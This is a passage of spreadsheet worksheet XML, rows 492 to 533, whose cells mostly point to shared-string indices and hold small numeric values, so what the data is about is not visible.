      </c>
      <c r="H492" s="81" t="s">
        <v>372</v>
      </c>
      <c r="I492" s="80" t="s">
        <v>1195</v>
      </c>
      <c r="J492" s="80" t="s">
        <v>1180</v>
      </c>
    </row>
    <row r="493" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A493" s="81" t="s">
        <v>300</v>
      </c>
      <c r="B493" s="80" t="s">
        <v>1000</v>
      </c>
      <c r="C493" s="80" t="s">
        <v>1002</v>
      </c>
      <c r="D493" s="81" t="s">
        <v>1026</v>
      </c>
      <c r="E493" s="80" t="s">
        <v>1194</v>
      </c>
      <c r="F493" s="81" t="n">
        <v>1</v>
      </c>
      <c r="G493" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H493" s="81" t="s">
        <v>372</v>
      </c>
      <c r="I493" s="80" t="s">
        <v>1195</v>
      </c>
      <c r="J493" s="80" t="s">
        <v>1180</v>
      </c>
    </row>
    <row r="494" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A494" s="81" t="s">
        <v>300</v>
      </c>
      <c r="B494" s="80" t="s">
        <v>1000</v>
      </c>
      <c r="C494" s="80" t="s">
        <v>1002</v>
      </c>
      <c r="D494" s="81" t="s">
        <v>1027</v>
      </c>
      <c r="E494" s="80" t="s">
        <v>1194</v>
      </c>
      <c r="F494" s="81" t="n">
        <v>1</v>
      </c>
      <c r="G494" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H494" s="81" t="s">
        <v>372</v>
      </c>
      <c r="I494" s="80" t="s">
        <v>1195</v>
      </c>
      <c r="J494" s="80" t="s">
        <v>1180</v>
      </c>
    </row>
    <row r="495" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A495" s="81" t="s">
        <v>300</v>
      </c>
      <c r="B495" s="80" t="s">
        <v>1000</v>
      </c>
      <c r="C495" s="80" t="s">
        <v>1002</v>
      </c>
      <c r="D495" s="81" t="s">
        <v>1028</v>
      </c>
      <c r="E495" s="80" t="s">
        <v>1194</v>
      </c>
      <c r="F495" s="81" t="n">
        <v>1</v>
      </c>
      <c r="G495" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H495" s="81" t="s">
        <v>372</v>
      </c>
      <c r="I495" s="80" t="s">
        <v>1195</v>
      </c>
      <c r="J495" s="80" t="s">
        <v>1180</v>
      </c>
    </row>
    <row r="496" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A496" s="81" t="s">
        <v>315</v>
      </c>
      <c r="B496" s="80" t="s">
        <v>1000</v>
      </c>
      <c r="C496" s="80" t="s">
        <v>1006</v>
      </c>
      <c r="D496" s="81" t="s">
        <v>1029</v>
      </c>
      <c r="E496" s="80" t="s">
        <v>1196</v>
      </c>
      <c r="F496" s="81" t="n">
        <v>1</v>
      </c>
      <c r="G496" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H496" s="81" t="s">
        <v>1197</v>
      </c>
      <c r="I496" s="80" t="s">
        <v>1196</v>
      </c>
      <c r="J496" s="80" t="s">
        <v>1180</v>
      </c>
    </row>
    <row r="497" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A497" s="81" t="s">
        <v>248</v>
      </c>
      <c r="B497" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C497" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D497" s="81" t="s">
        <v>822</v>
      </c>
      <c r="E497" s="80" t="s">
        <v>1266</v>
      </c>
      <c r="F497" s="81" t="n">
        <v>1.5</v>
      </c>
      <c r="G497" s="81" t="n">
        <v>1.5</v>
      </c>
      <c r="H497" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I497" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J497" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="498" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A498" s="81" t="s">
        <v>248</v>
      </c>
      <c r="B498" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C498" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D498" s="81" t="s">
        <v>822</v>
      </c>
      <c r="E498" s="80" t="s">
        <v>1267</v>
      </c>
      <c r="F498" s="81" t="n">
        <v>2</v>
      </c>
      <c r="G498" s="81" t="n">
        <v>2</v>
      </c>
      <c r="H498" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I498" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J498" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="499" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A499" s="81" t="s">
        <v>248</v>
      </c>
      <c r="B499" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C499" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D499" s="81" t="s">
        <v>823</v>
      </c>
      <c r="E499" s="80" t="s">
        <v>1266</v>
      </c>
      <c r="F499" s="81" t="n">
        <v>1.5</v>
      </c>
      <c r="G499" s="81" t="n">
        <v>1.5</v>
      </c>
      <c r="H499" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I499" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J499" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="500" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A500" s="81" t="s">
        <v>248</v>
      </c>
      <c r="B500" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C500" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D500" s="81" t="s">
        <v>823</v>
      </c>
      <c r="E500" s="80" t="s">
        <v>1267</v>
      </c>
      <c r="F500" s="81" t="n">
        <v>2</v>
      </c>
      <c r="G500" s="81" t="n">
        <v>2</v>
      </c>
      <c r="H500" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I500" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J500" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="501" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A501" s="81" t="s">
        <v>248</v>
      </c>
      <c r="B501" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C501" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D501" s="81" t="s">
        <v>824</v>
      </c>
      <c r="E501" s="80" t="s">
        <v>1266</v>
      </c>
      <c r="F501" s="81" t="n">
        <v>1.5</v>
      </c>
      <c r="G501" s="81" t="n">
        <v>1.5</v>
      </c>
      <c r="H501" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I501" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J501" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="502" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A502" s="81" t="s">
        <v>248</v>
      </c>
      <c r="B502" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C502" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D502" s="81" t="s">
        <v>824</v>
      </c>
      <c r="E502" s="80" t="s">
        <v>1267</v>
      </c>
      <c r="F502" s="81" t="n">
        <v>2</v>
      </c>
      <c r="G502" s="81" t="n">
        <v>2</v>
      </c>
      <c r="H502" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I502" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J502" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="503" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A503" s="81" t="s">
        <v>248</v>
      </c>
      <c r="B503" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C503" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D503" s="81" t="s">
        <v>825</v>
      </c>
      <c r="E503" s="80" t="s">
        <v>1266</v>
      </c>
      <c r="F503" s="81" t="n">
        <v>1.5</v>
      </c>
      <c r="G503" s="81" t="n">
        <v>1.5</v>
      </c>
      <c r="H503" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I503" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J503" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="504" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A504" s="81" t="s">
        <v>248</v>
      </c>
      <c r="B504" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C504" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D504" s="81" t="s">
        <v>825</v>
      </c>
      <c r="E504" s="80" t="s">
        <v>1267</v>
      </c>
      <c r="F504" s="81" t="n">
        <v>2</v>
      </c>
      <c r="G504" s="81" t="n">
        <v>2</v>
      </c>
      <c r="H504" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I504" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J504" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="505" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A505" s="81" t="s">
        <v>248</v>
      </c>
      <c r="B505" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C505" s="80" t="s">
        <v>827</v>
      </c>
      <c r="D505" s="81" t="s">
        <v>828</v>
      </c>
      <c r="E505" s="80" t="s">
        <v>1268</v>
      </c>
      <c r="F505" s="81" t="n">
        <v>1</v>
      </c>
      <c r="G505" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H505" s="81" t="s">
        <v>363</v>
      </c>
      <c r="I505" s="80" t="s">
        <v>1185</v>
      </c>
      <c r="J505" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="506" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A506" s="81" t="s">
        <v>248</v>
      </c>
      <c r="B506" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C506" s="80" t="s">
        <v>827</v>
      </c>
      <c r="D506" s="81" t="s">
        <v>829</v>
      </c>
      <c r="E506" s="80" t="s">
        <v>1268</v>
      </c>
      <c r="F506" s="81" t="n">
        <v>1</v>
      </c>
      <c r="G506" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H506" s="81" t="s">
        <v>363</v>
      </c>
      <c r="I506" s="80" t="s">
        <v>1185</v>
      </c>
      <c r="J506" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="507" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A507" s="81" t="s">
        <v>248</v>
      </c>
      <c r="B507" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C507" s="80" t="s">
        <v>827</v>
      </c>
      <c r="D507" s="81" t="s">
        <v>830</v>
      </c>
      <c r="E507" s="80" t="s">
        <v>1268</v>
      </c>
      <c r="F507" s="81" t="n">
        <v>1</v>
      </c>
      <c r="G507" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H507" s="81" t="s">
        <v>363</v>
      </c>
      <c r="I507" s="80" t="s">
        <v>1185</v>
      </c>
      <c r="J507" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="508" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A508" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B508" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C508" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D508" s="81" t="s">
        <v>835</v>
      </c>
      <c r="E508" s="80" t="s">
        <v>1269</v>
      </c>
      <c r="F508" s="81" t="n">
        <v>1</v>
      </c>
      <c r="G508" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H508" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I508" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J508" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="509" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A509" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B509" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C509" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D509" s="81" t="s">
        <v>835</v>
      </c>
      <c r="E509" s="80" t="s">
        <v>1270</v>
      </c>
      <c r="F509" s="81" t="n">
        <v>12</v>
      </c>
      <c r="G509" s="81" t="n">
        <v>1</v>
      </c>
      <c r="I509" s="80" t="s">
        <v>1230</v>
      </c>
      <c r="J509" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="510" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A510" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B510" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C510" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D510" s="81" t="s">
        <v>835</v>
      </c>
      <c r="E510" s="80" t="s">
        <v>1271</v>
      </c>
      <c r="F510" s="81" t="n">
        <v>24</v>
      </c>
      <c r="G510" s="81" t="n">
        <v>1</v>
      </c>
      <c r="I510" s="80" t="s">
        <v>1230</v>
      </c>
      <c r="J510" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="511" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A511" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B511" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C511" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D511" s="81" t="s">
        <v>836</v>
      </c>
      <c r="E511" s="80" t="s">
        <v>1269</v>
      </c>
      <c r="F511" s="81" t="n">
        <v>1</v>
      </c>
      <c r="G511" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H511" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I511" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J511" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="512" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A512" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B512" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C512" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D512" s="81" t="s">
        <v>836</v>
      </c>
      <c r="E512" s="80" t="s">
        <v>1270</v>
      </c>
      <c r="F512" s="81" t="n">
        <v>12</v>
      </c>
      <c r="G512" s="81" t="n">
        <v>1</v>
      </c>
      <c r="I512" s="80" t="s">
        <v>1230</v>
      </c>
      <c r="J512" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="513" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A513" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B513" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C513" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D513" s="81" t="s">
        <v>836</v>
      </c>
      <c r="E513" s="80" t="s">
        <v>1271</v>
      </c>
      <c r="F513" s="81" t="n">
        <v>24</v>
      </c>
      <c r="G513" s="81" t="n">
        <v>1</v>
      </c>
      <c r="I513" s="80" t="s">
        <v>1230</v>
      </c>
      <c r="J513" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="514" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A514" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B514" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C514" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D514" s="81" t="s">
        <v>837</v>
      </c>
      <c r="E514" s="80" t="s">
        <v>1269</v>
      </c>
      <c r="F514" s="81" t="n">
        <v>1</v>
      </c>
      <c r="G514" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H514" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I514" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J514" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="515" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A515" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B515" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C515" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D515" s="81" t="s">
        <v>837</v>
      </c>
      <c r="E515" s="80" t="s">
        <v>1270</v>
      </c>
      <c r="F515" s="81" t="n">
        <v>12</v>
      </c>
      <c r="G515" s="81" t="n">
        <v>1</v>
      </c>
      <c r="I515" s="80" t="s">
        <v>1230</v>
      </c>
      <c r="J515" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="516" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A516" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B516" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C516" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D516" s="81" t="s">
        <v>837</v>
      </c>
      <c r="E516" s="80" t="s">
        <v>1271</v>
      </c>
      <c r="F516" s="81" t="n">
        <v>24</v>
      </c>
      <c r="G516" s="81" t="n">
        <v>1</v>
      </c>
      <c r="I516" s="80" t="s">
        <v>1230</v>
      </c>
      <c r="J516" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="517" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A517" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B517" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C517" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D517" s="81" t="s">
        <v>838</v>
      </c>
      <c r="E517" s="80" t="s">
        <v>1269</v>
      </c>
      <c r="F517" s="81" t="n">
        <v>1</v>
      </c>
      <c r="G517" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H517" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I517" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J517" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="518" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A518" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B518" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C518" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D518" s="81" t="s">
        <v>838</v>
      </c>
      <c r="E518" s="80" t="s">
        <v>1270</v>
      </c>
      <c r="F518" s="81" t="n">
        <v>12</v>
      </c>
      <c r="G518" s="81" t="n">
        <v>1</v>
      </c>
      <c r="I518" s="80" t="s">
        <v>1230</v>
      </c>
      <c r="J518" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="519" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A519" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B519" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C519" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D519" s="81" t="s">
        <v>838</v>
      </c>
      <c r="E519" s="80" t="s">
        <v>1271</v>
      </c>
      <c r="F519" s="81" t="n">
        <v>24</v>
      </c>
      <c r="G519" s="81" t="n">
        <v>1</v>
      </c>
      <c r="I519" s="80" t="s">
        <v>1230</v>
      </c>
      <c r="J519" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="520" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A520" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B520" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C520" s="80" t="s">
        <v>827</v>
      </c>
      <c r="D520" s="81" t="s">
        <v>839</v>
      </c>
      <c r="E520" s="80" t="s">
        <v>1272</v>
      </c>
      <c r="F520" s="81" t="n">
        <v>2</v>
      </c>
      <c r="G520" s="81" t="n">
        <v>2</v>
      </c>
      <c r="H520" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I520" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J520" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="521" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A521" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B521" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C521" s="80" t="s">
        <v>827</v>
      </c>
      <c r="D521" s="81" t="s">
        <v>839</v>
      </c>
      <c r="E521" s="80" t="s">
        <v>1273</v>
      </c>
      <c r="F521" s="81" t="n">
        <v>1</v>
      </c>
      <c r="G521" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H521" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I521" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J521" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="522" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A522" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B522" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C522" s="80" t="s">
        <v>827</v>
      </c>
      <c r="D522" s="81" t="s">
        <v>839</v>
      </c>
      <c r="E522" s="80" t="s">
        <v>1274</v>
      </c>
      <c r="F522" s="81" t="n">
        <v>1</v>
      </c>
      <c r="G522" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H522" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I522" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J522" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="523" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A523" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B523" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C523" s="80" t="s">
        <v>827</v>
      </c>
      <c r="D523" s="81" t="s">
        <v>840</v>
      </c>
      <c r="E523" s="80" t="s">
        <v>1272</v>
      </c>
      <c r="F523" s="81" t="n">
        <v>2</v>
      </c>
      <c r="G523" s="81" t="n">
        <v>2</v>
      </c>
      <c r="H523" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I523" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J523" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="524" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A524" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B524" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C524" s="80" t="s">
        <v>827</v>
      </c>
      <c r="D524" s="81" t="s">
        <v>840</v>
      </c>
      <c r="E524" s="80" t="s">
        <v>1273</v>
      </c>
      <c r="F524" s="81" t="n">
        <v>1</v>
      </c>
      <c r="G524" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H524" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I524" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J524" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="525" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A525" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B525" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C525" s="80" t="s">
        <v>827</v>
      </c>
      <c r="D525" s="81" t="s">
        <v>840</v>
      </c>
      <c r="E525" s="80" t="s">
        <v>1274</v>
      </c>
      <c r="F525" s="81" t="n">
        <v>1</v>
      </c>
      <c r="G525" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H525" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I525" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J525" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="526" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A526" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B526" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C526" s="80" t="s">
        <v>827</v>
      </c>
      <c r="D526" s="81" t="s">
        <v>841</v>
      </c>
      <c r="E526" s="80" t="s">
        <v>1272</v>
      </c>
      <c r="F526" s="81" t="n">
        <v>2</v>
      </c>
      <c r="G526" s="81" t="n">
        <v>2</v>
      </c>
      <c r="H526" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I526" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J526" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="527" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A527" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B527" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C527" s="80" t="s">
        <v>827</v>
      </c>
      <c r="D527" s="81" t="s">
        <v>841</v>
      </c>
      <c r="E527" s="80" t="s">
        <v>1273</v>
      </c>
      <c r="F527" s="81" t="n">
        <v>1</v>
      </c>
      <c r="G527" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H527" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I527" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J527" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="528" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A528" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B528" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C528" s="80" t="s">
        <v>827</v>
      </c>
      <c r="D528" s="81" t="s">
        <v>841</v>
      </c>
      <c r="E528" s="80" t="s">
        <v>1274</v>
      </c>
      <c r="F528" s="81" t="n">
        <v>1</v>
      </c>
      <c r="G528" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H528" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I528" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J528" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="529" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A529" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B529" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C529" s="80" t="s">
        <v>832</v>
      </c>
      <c r="D529" s="81" t="s">
        <v>842</v>
      </c>
      <c r="E529" s="80" t="s">
        <v>1275</v>
      </c>
      <c r="F529" s="81" t="n">
        <v>1.5</v>
      </c>
      <c r="G529" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H529" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I529" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J529" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="530" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A530" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B530" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C530" s="80" t="s">
        <v>832</v>
      </c>
      <c r="D530" s="81" t="s">
        <v>842</v>
      </c>
      <c r="E530" s="80" t="s">
        <v>1276</v>
      </c>
      <c r="F530" s="81" t="n">
        <v>1.5</v>
      </c>
      <c r="G530" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H530" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I530" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J530" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="531" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A531" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B531" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C531" s="80" t="s">
        <v>832</v>
      </c>
      <c r="D531" s="81" t="s">
        <v>843</v>
      </c>
      <c r="E531" s="80" t="s">
        <v>1275</v>
      </c>
      <c r="F531" s="81" t="n">
        <v>1.5</v>
      </c>
      <c r="G531" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H531" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I531" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J531" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="532" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A532" s="81" t="s">
        <v>282</v>
      </c>
      <c r="B532" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C532" s="80" t="s">
        <v>832</v>
      </c>
      <c r="D532" s="81" t="s">
        <v>843</v>
      </c>
      <c r="E532" s="80" t="s">
        <v>1276</v>
      </c>
      <c r="F532" s="81" t="n">
        <v>1.5</v>
      </c>
      <c r="G532" s="81" t="n">
        <v>1</v>
      </c>
      <c r="H532" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I532" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J532" s="80" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="533" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A533" s="81" t="s">
        <v>300</v>
      </c>
      <c r="B533" s="80" t="s">
        <v>819</v>
      </c>
      <c r="C533" s="80" t="s">
        <v>821</v>
      </c>
      <c r="D533" s="81" t="s">
        <v>844</v>
      </c>
      <c r="E533" s="80" t="s">
        <v>1277</v>
      </c>
      <c r="F533" s="81" t="n">
        <v>1.5</v>
      </c>
      <c r="G533" s="81" t="n">
        <v>1.5</v>
      </c>
      <c r="H533" s="81" t="s">
        <v>254</v>
      </c>
      <c r="I533" s="80" t="s">
        <v>1172</v>
      </c>
      <c r="J533" s="80" t="s">
        <v>819</v>
      </c>
    </row>
